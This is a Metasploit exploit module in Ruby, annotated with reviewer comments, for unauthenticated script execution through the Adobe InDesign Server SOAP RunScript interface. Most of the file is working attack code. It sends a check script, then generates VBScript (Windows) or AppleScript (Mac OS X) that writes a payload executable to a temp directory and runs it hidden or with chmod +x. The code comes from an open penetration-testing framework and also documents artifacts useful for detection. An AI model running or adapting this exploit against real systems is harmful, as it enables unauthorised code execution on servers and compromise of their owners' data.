Path: blob/master/modules/exploits/multi/misc/indesign_server_soap.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the "RunScript" procedure of the Adobe InDesign Server
# SOAP interface (see 'Description' below).
#
# Everything the module sends goes through #send_soap_request: an HTTP POST
# to "/" on RPORT (default 12345) whose body is a SOAP envelope carrying
# <IDSP:RunScript> with a scriptText/scriptLanguage pair. That request shape,
# the scriptLanguage values used here ("javascript", "visual basic",
# "applescript") and the dropped files named in the print_warning calls of
# #exploit are the artifacts this module leaves behind for detection and
# cleanup.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  # Module metadata: two x64 targets (Windows, Mac OS X) that #exploit tells
  # apart by matching target.name, and a single option, RPORT (default 12345).
  #
  # @param info [Hash] framework-supplied module info merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution',
      'Description'    => %q{
        This module abuses the "RunScript" procedure provided by the SOAP interface of
        Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX).

        The exploit drops the payload on the server and must be removed manually.
      },
      'Author'         =>
        [
          'h0ng10', # Vulnerability discovery / Metasploit module
          'juan vazquez' # MacOSX target
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => %w{ osx win },
      'Privileged'     => false,
      'DisclosureDate' => '2012-11-11',
      'References'     =>
        [
          [ 'OSVDB', '87548'],
          [ 'URL', 'http://web.archive.org/web/20130119134644/http://secunia.com/advisories/48572/' ]
        ],
      'Targets'        =>
        [
          [
            'Indesign CS6 Server / Windows (64 bits)',
            {
              'Arch' => ARCH_X64,
              'Platform' => 'win'
            }
          ],
          [
            'Indesign CS6 Server / Mac OS X Snow Leopard 64 bits',
            {
              'Arch' => ARCH_X64,
              'Platform' => 'osx'
            }
          ]
        ],
      'DefaultTarget'  => 0
    ))

    register_options( [ Opt::RPORT(12345) ])
  end


  # Wraps script_code in a SOAP <IDSP:RunScript> envelope and POSTs it to "/".
  #
  # @param script_code [String] script source; mutated in place by gsub! before
  #   being interpolated into <IDSP:scriptText>
  # @param script_type [String] value placed in <IDSP:scriptLanguage>
  # @return whatever send_request_cgi returns (the last expression); callers in
  #   #exploit treat nil as "no response", #check does not check for it
  def send_soap_request(script_code, script_type)
    # NOTE(review): as rendered on this page the replacement is "&" -> "&", a
    # no-op; presumably the upstream source substitutes the XML entity and the
    # page rendering decoded it -- confirm against the original file before
    # relying on it as an escape step.
    script_code.gsub!(/&/, '&')
    soap_xml = %Q{
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:IDSP="http://ns.adobe.com/InDesign/soap/">
<SOAP-ENV:Body>
<IDSP:RunScript>
<IDSP:runScriptParameters>
<IDSP:scriptText>#{script_code}</IDSP:scriptText>
<IDSP:scriptLanguage>#{script_type}</IDSP:scriptLanguage>
</IDSP:runScriptParameters>
</IDSP:RunScript>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
}

    # The body is XML but is declared as form-urlencoded (kept as written; the
    # server apparently accepts it). The trailing 5 is the request timeout in
    # seconds, so a slow or silent server yields a nil result.
    res = send_request_cgi({
      'uri'  => '/',
      'method' => 'POST',
      'content-type' => 'application/x-www-form-urlencoded',
      'data' => soap_xml,
    }, 5)
  end


  # Vulnerability check: runs a one-line JavaScript that sets returnValue to a
  # random 10-digit string and reports Vulnerable only when the response echoes
  # that exact string inside <data xsi:type="xsd:string">...</data>; otherwise
  # Safe.
  #
  # NOTE(review): unlike #exploit, res is not nil-checked here, so a timeout
  # (nil response) raises NoMethodError on res.body instead of returning a
  # CheckCode.
  #
  # @return [Exploit::CheckCode] Vulnerable or Safe
  def check()
    # Use a very simple javascript
    check_var = rand_text_numeric(10)
    checkscript = 'returnValue = "' + check_var + '"'

    res = send_soap_request(checkscript, "javascript")

    return Exploit::CheckCode::Vulnerable if res.body.include?('<data xsi:type="xsd:string">' + check_var + '</data>')

    return Exploit::CheckCode::Safe
  end

  # Delivers the generated EXE through RunScript. Branches on target.name:
  #   Windows  -> VBScript that decodes a hex string into
  #               <FSO special folder 2, the temp folder>\<random>.exe and
  #               runs it with a hidden window
  #   Mac OS X -> AppleScript that writes a uuencode/base64 wrapper to
  #               /tmp/<random>.txt, decodes it to /tmp/<random>, then
  #               chmod +x and executes it
  # Neither script deletes the dropped binary; the module only prints its path
  # (parsed from the scriptResult <data> element, with a fallback on Mac) via
  # print_warning so it can be removed by hand.
  def exploit

    if target.name =~ /Windows/
      print_status("Creating payload vbs script")
      # EXE bytes as one hex string; the VBScript below re-assembles it.
      encoded_payload = generate_payload_exe().unpack("H*").join
      exe_file = Rex::Text.rand_text_alpha_upper(8) + ".exe"
      # Random identifiers for every variable in the generated script.
      wsf = Rex::Text.rand_text_alpha(8)
      payload_var = Rex::Text.rand_text_alpha(8)
      exe_name_var = Rex::Text.rand_text_alpha(8)
      file_var = Rex::Text.rand_text_alpha(8)
      byte_var = Rex::Text.rand_text_alpha(8)
      shell_var = Rex::Text.rand_text_alpha(8)

      # This one creates a smaller vbs payload (without deletion)
      # GetSpecialFolder(2) is the FSO TemporaryFolder. Each hex pair becomes
      # the string "&Hxx" (Chr(38) is "&"), which Chr() coerces as a VBScript
      # hex literal back to the byte value. Run(..., 0, False): hidden window,
      # no wait. returnValue carries the dropped path back in the SOAP reply.
      vbs = %Q{
Set #{wsf} = CreateObject("Scripting.FileSystemObject")
#{payload_var} = "#{encoded_payload}"
#{exe_name_var} = #{wsf}.GetSpecialFolder(2) + "\\#{exe_file}"
Set #{file_var} = #{wsf}.opentextfile(#{exe_name_var}, 2, TRUE)
For x = 1 To Len(#{payload_var})-3 Step 2
#{byte_var} = Chr(38) & "H" & Mid(#{payload_var}, x, 2)
#{file_var}.write Chr(#{byte_var})
Next

#{file_var}.write Chr(#{byte_var})
#{file_var}.close

Set #{shell_var} = CreateObject("Wscript.Shell")
#{shell_var}.Run Chr(34) & #{exe_name_var} & Chr(34), 0, False
Set #{shell_var} = Nothing
returnValue = #{exe_name_var}
}
      # vbs = Msf::Util::EXE.to_exe_vbs(exe)
      print_status("Sending SOAP request")

      res = send_soap_request(vbs, "visual basic")
      # Only report the dropped path when a response body actually came back.
      if res != nil and res.body != nil then
        file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]
        print_warning "Payload deployed to #{file_to_delete.to_s}, please remove manually"
      end

    elsif target.name =~ /Mac OS X/

      print_status("Creating payload apple script")

      exe_payload = generate_payload_exe
      b64_exe_payload = Rex::Text.encode_base64(exe_payload)
      # Random names of 5..9 letters for the wrapper file and the binary.
      b64_payload_name = rand_text_alpha(rand(5) + 5)
      payload_name = rand_text_alpha(rand(5) + 5)

      # "begin-base64 644 <name>" ... "====" is the base64 form that
      # uudecode(1) accepts; the wrapper is removed, the decoded binary is not.
      apple_script = %Q{
set fp to open for access POSIX file "/tmp/#{b64_payload_name}.txt" with write permission
write "begin-base64 644 #{payload_name}\n#{b64_exe_payload}\n====\n" to fp
close access fp
do shell script "uudecode -o /tmp/#{payload_name} /tmp/#{b64_payload_name}.txt"
do shell script "rm /tmp/#{b64_payload_name}.txt"
do shell script "chmod +x /tmp/#{payload_name}"
do shell script "/tmp/#{payload_name}"
set returnValue to "/tmp/#{payload_name}"
}

      print_status("Sending SOAP request")

      res = send_soap_request(apple_script, "applescript")

      # A nil response is treated as normal here (the script runs the payload
      # in the foreground, so the SOAP call may not return within the timeout);
      # the known /tmp path is reported either way.
      if res != nil and res.body != nil then
        file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]
        file_to_delete = "/tmp/#{payload_name}" if file_to_delete.nil? or file_to_delete.empty?
        print_warning "Payload deployed to #{file_to_delete.to_s}, please remove manually"
      elsif not res
        print_status "No response, it's expected"
        print_warning "Payload deployed to /tmp/#{payload_name}, please remove manually"
      end

    end

  end
end